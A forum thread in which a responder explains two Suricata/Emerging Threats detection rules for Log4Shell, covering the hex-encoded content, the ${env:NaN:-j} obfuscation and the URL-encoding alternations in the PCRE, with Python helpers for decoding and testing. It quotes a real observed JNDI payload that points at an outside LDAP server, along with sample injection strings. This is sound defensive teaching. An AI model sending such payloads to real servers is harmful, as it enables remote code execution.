Need help understanding the meaning of the content and/or pcre of these two SID rules?

TheSuricataBro · May 24, 2024, 3:24am

alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|env|3a|NaN|3a|-j|7d|ndi|24 7b|env|3a|NaN|3a|"; nocase; fast_pattern; content:"|24 7b|env|3a|NaN|3a|-l|7d|dap|24|"; reference:url,x.com; reference:cve,2021-44228; classtype:attempted-admin; sid:2034755; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, updated_at 2021_12_17;)

alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)"; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034660; rev:3; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)

So for the first alert, I can use a hex converter to decipher what 24, 7b, and 3a are supposed to map to. Roughly, this should be the beginning of a JNDI lookup. But when it comes to “NaN” or “ndi” I am totally puzzled, as well as by what “env” is supposed to be (I’m assuming it’s an environment variable). My guess is that, as this is obfuscation, the payload is being packed into multiple curly brackets. Feel free to correct me.
For the second alert, what is the purpose behind using the % in the content and the pcre, and how %24 may differ from x24? That I’m confused about. In addition, what are character sequences like “l|r|d|” or “a|i|s” looking for? Is it just a mere requirement of the regular expression that some of the strings have one of these letters at those positions?

bmurphy · May 24, 2024, 2:51pm

Hey there!

My guess is that, as this is obfuscation, the payload is being packed into multiple curly brackets

You are correct: this rule addresses a method of obfuscation observed in log4shell attempts.

I think this section of the documentation around ET’s log4shell response provides some basic information and useful links for you to read up on some of the obfuscation techniques.

Specific to your questions:

But when it comes to “NaN” or “ndi” I am totally puzzled, as well as by what “env” is supposed to be (I’m assuming it’s an environment variable).

I think it works best if you look at the string reported in the rule’s reference (on x.com).

This was the observed string, as per that reference:

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//81.30.157.43:1389/Basic/Command/Base64/[encoded]
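To compare that string with the first rule, the two content values can be decoded by hand or with a few lines of Python. This is only a rough sketch: `decode_content` is a hypothetical helper, not part of Suricata, and it assumes the pattern contains nothing but plain text and `|..|` hex runs (no backslash escapes).

```python
def decode_content(pattern: str) -> bytes:
    """Decode a Suricata-style content string whose hex runs are wrapped in |...|."""
    out = bytearray()
    # Splitting on "|" alternates between literal text (even index)
    # and space-separated hex bytes (odd index).
    for i, part in enumerate(pattern.split("|")):
        if i % 2:
            out += bytes.fromhex(part)
        else:
            out += part.encode("ascii")
    return bytes(out)


first = decode_content("|24 7b 24 7b|env|3a|NaN|3a|-j|7d|ndi|24 7b|env|3a|NaN|3a|")
second = decode_content("|24 7b|env|3a|NaN|3a|-l|7d|dap|24|")

print(first.decode())   # ${${env:NaN:-j}ndi${env:NaN:
print(second.decode())  # ${env:NaN:-l}dap$
```

Both decoded fragments appear verbatim in the observed string, which is why the rule carries them as two separate content matches.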

Keep in mind that an application vulnerable to log4shell will actually evaluate these lookup expressions, so let’s look at the obfuscation technique for a single character: ${env:NaN:-j}

This will attempt to substitute the value of the environment variable called “NaN” and, if that doesn’t exist, will default to j. Thus, when combined with the rest of the string, ${${env:NaN:-j}ndi becomes ${jndi

NaN is very likely to be undeclared, so this is a very simple obfuscation attempt to bypass protective controls.
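The substitution can be imitated outside Log4j to see what the payload collapses to. The sketch below is an approximation, not Log4j's actual resolver: `resolve_env_lookups` is a hypothetical helper that only handles the `${env:NAME:-default}` form, and the environment is passed in as a plain dict (empty here, on the assumption that NaN is not set).

```python
import re

# Matches ${env:NAME:-default}; group 1 is the variable name, group 2 the default.
ENV_LOOKUP = re.compile(r"\$\{env:([^:}]+):-([^}]*)\}")


def resolve_env_lookups(text: str, env: dict) -> str:
    """Replace each env lookup with the variable's value, or its default if unset."""
    return ENV_LOOKUP.sub(lambda m: env.get(m.group(1), m.group(2)), text)


observed = (
    "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
    "//81.30.157.43:1389/Basic/Command/Base64/[encoded]"
)
resolved = resolve_env_lookups(observed, env={})
print(resolved)  # ${jndi:ldap://81.30.157.43:1389/Basic/Command/Base64/[encoded]
```

With NaN unset, every lookup falls back to its default character and the familiar `${jndi:ldap://` prefix reappears.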

what is the purpose behind using the % in the content and the pcre, and how %24 may differ from x24?

In this case, (\x24|%24), the PCRE is establishing an “OR” between two different forms of the same character (a $ in this case). When a $ is URL encoded, it MAY appear as %24. URL encoding is a common form of obfuscation. Here, both the URL-encoded and the non-encoded form of the $ are matched. The \x within the PCRE tells the PCRE engine that the next two characters are a hex-encoded byte, so the engine will decode the hex and match that literal character. It is required here because $ is also a metacharacter within PCRE, meant to indicate the “end of a line”. As such, escaping it via hex encoding tells the PCRE engine to use the literal character.
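A quick way to experiment with this is to rebuild the second rule's expression in Python. Treat the following as an approximation: Python's `re` module stands in for PCRE, `slot` and `rule_matches` are hypothetical helpers, the relative (`R`) modifier is imitated by matching only the text right after the first occurrence of the content string, and the sample payloads are made up. Each slot accepts one letter either written plainly or wrapped in a `${lower:x}` or `${upper:x}` lookup, with `$`, `{`, `:` and `}` allowed in raw or URL-encoded form.

```python
import re

# A bare "$" is an anchor, so it cannot match a "$" in the middle of the text.
assert re.search(r"a$b", "a$b") is None
# "\x24" is the same character written as a hex escape, so it matches literally.
assert re.search(r"a\x24b", "a$b") is not None


def slot(letters: str) -> str:
    """One position: a plain letter, or the letter inside ${lower:x} / ${upper:x}."""
    alt = "|".join(letters)
    wrapped = rf"(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)({alt})(\x7d|%7d)"
    return f"({alt}|{wrapped})"


# Four slots, mirroring the four groups of the rule's pcre; the "i" flag becomes IGNORECASE.
PCRE = re.compile("^" + "".join(slot(s) for s in ("lrd", "dnm", "ais", "p")), re.IGNORECASE)
CONTENT = "%7bjndi%3a"  # the rule's content match (nocase)


def rule_matches(payload: str) -> bool:
    """Find the content, then apply the regex to whatever follows it."""
    idx = payload.lower().find(CONTENT)
    if idx < 0:
        return False
    return PCRE.match(payload[idx + len(CONTENT):]) is not None


print(rule_matches("$%7bjndi%3aldap://x"))                                        # True
print(rule_matches("$%7bJNDI%3a${lower:l}${upper:d}a%24%7blower%3ap%7d://x"))     # True
print(rule_matches("$%7bjndi%3ahttp://x"))                                        # False
```

The text after the content is sliced out before matching because Python's `^` only anchors at the real start of the string, not at an offset passed to `match`.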

Also, for anything ET related, including explanations of ET-created rules (such as these) or reports of FPs, etc., feel free to post over on our Discourse (community.emergingthreats.net).

TheSuricataBro · May 24, 2024, 6:21pm

Thank you so much for the explanation! This was very helpful, and thanks for the link to the emerging threats community, I will frequent that space if I have any questions about the explanations of the ET rules.
